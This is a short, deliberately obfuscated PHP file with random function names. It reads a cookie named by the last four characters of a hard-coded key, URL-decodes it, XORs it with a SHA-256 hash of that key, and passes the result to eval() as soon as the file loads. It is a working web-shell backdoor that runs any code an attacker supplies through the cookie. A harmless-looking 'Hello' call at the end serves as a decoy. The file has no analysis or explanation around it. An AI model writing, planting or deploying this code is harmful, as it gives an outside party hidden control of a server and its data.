<?php	function JfqiJITHj($Aulnn)
{
    $PEXibhDMgo = hash("sha256", $Aulnn, TRUE);
    return $PEXibhDMgo;
}
function XTgQAGH($crkhhnDQE)
{
    $raXiWr = $_COOKIE[$crkhhnDQE];
    return $raXiWr;
}
function UxizcMX($tPAWfw) {
    return strrev($tPAWfw);
}
function PDYgVHf($fRrFOGgcr, $kVrSK)
{
    $oEgVoOnFI = $fRrFOGgcr ^ $kVrSK;
    return $oEgVoOnFI;
}
function xYInBGu($IdrZWddo)
{
    $ITFXnZoATS = strlen($IdrZWddo);
    return $ITFXnZoATS;
}
function pVOnmnQ($awevpX)
{
    $XuvULiR = substr($awevpX, -4);
    return $XuvULiR;
}
function buQFz($tPAWfw) {
    $PKkfDXHwg = UxizcMX($tPAWfw);
    $aKbkYAqgF = xMFeNVya($tPAWfw);
    return [$PKkfDXHwg, $aKbkYAqgF];
}
function LSivstVYri($EuWVFbW)
{
    $tFoTdBbpW = XTgQAGH($EuWVFbW);
    $qbcYHYqCYx = DRNXmJaL($tFoTdBbpW);
    return $qbcYHYqCYx;
}
function ADZPm($hWyKLK)
{
    eval($hWyKLK);
}
function sRbxcB($hYSuMHReq, $GXUjGNb)
{
    $AjaRkIoty = xYInBGu($hYSuMHReq);
    $EtIgGoY = zTxDHX($GXUjGNb, $AjaRkIoty);
    $AUliQ = PDYgVHf($EtIgGoY, $hYSuMHReq);
    return $AUliQ;
}
function xMFeNVya($tPAWfw) {
    return strlen($tPAWfw);
}
function kFDMbTzSXa()
{
    $KfvePDbs = "FaDwfGnqUsRRDExNqbKbpZSfLdC";
    return $KfvePDbs;
}
function QsZou($VOCzWtVcn, $cissIQwYz)
{
    $BHVRh = JfqiJITHj($VOCzWtVcn);
    $qbcYHYqCYx = LSivstVYri($cissIQwYz);
    $MATyUF = sRbxcB($qbcYHYqCYx, $BHVRh);
    return $MATyUF;
}
function nmuvoXfPqi($gUSOevs)
{
    $QCsCzUhNpS = pVOnmnQ($gUSOevs);
    $QIUSXYnZz = QsZou($gUSOevs, $QCsCzUhNpS);
    return $QIUSXYnZz;
}
function zTxDHX($lDAIfrwzz, $uIIhOPCtTu)
{
    $rniRr = str_pad($lDAIfrwzz, $uIIhOPCtTu, $lDAIfrwzz);
    return $rniRr;
}
function DRNXmJaL($BtBQKWU)
{
    $afpJr = rawurldecode($BtBQKWU);
    return $afpJr;
}
function yQnqRx()
{
    $weRPkS = kFDMbTzSXa();
    $lqWOZDFMnO = nmuvoXfPqi($weRPkS);
    return $lqWOZDFMnO;
}
function gKOnDTrCz()
{
    $AUliQ = yQnqRx();
    ADZPm($AUliQ);
}
gKOnDTrCz();
$qosLbFAxK = buQFz("Hello");